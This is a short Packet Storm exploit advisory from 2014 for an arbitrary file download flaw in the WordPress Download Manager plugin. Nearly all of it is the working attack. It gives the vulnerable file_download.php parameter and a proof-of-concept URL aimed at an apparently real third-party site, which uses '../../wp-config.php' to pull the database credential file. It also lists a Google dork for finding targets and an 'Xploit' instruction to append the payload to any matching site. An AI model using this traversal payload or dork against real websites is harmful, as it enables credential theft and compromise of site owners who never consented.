WordPress Download Manager Arbitrary File Download

2014-10-26T00:00:00
ID PACKETSTORM:128852
Type packetstorm
Reporter Hugo Santiago dos Santos
Modified 2014-10-26T00:00:00

Description

                                        
                                            `# WordPress Download Manager Plugin - Arbitrary File Download  
# CWE: CWE-98  
# Risk: High  
# Author: Hugo Santiago dos Santos  
# Contact: hugo.s@linuxmail.org  
# Date: 25/10/2014  
# Vendor Homepage: https://wordpress.org/plugins/download-manager/  
# Tested on: Windows 7 and Gnu/Linux  
# Google Dork: inurl:/plugins/download-manager/  
  
# VUL: /views/file_download.php?fname=  
  
or:  
  
/file_download.php?fname=  
  
# PoC :   
  
http://triec.ca/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php  
  
  
# Xploit: Find one website with use /plugins/download-manager/ && ADD TO Link:/views/file_download.php?fname=../../wp-config.php  
  
`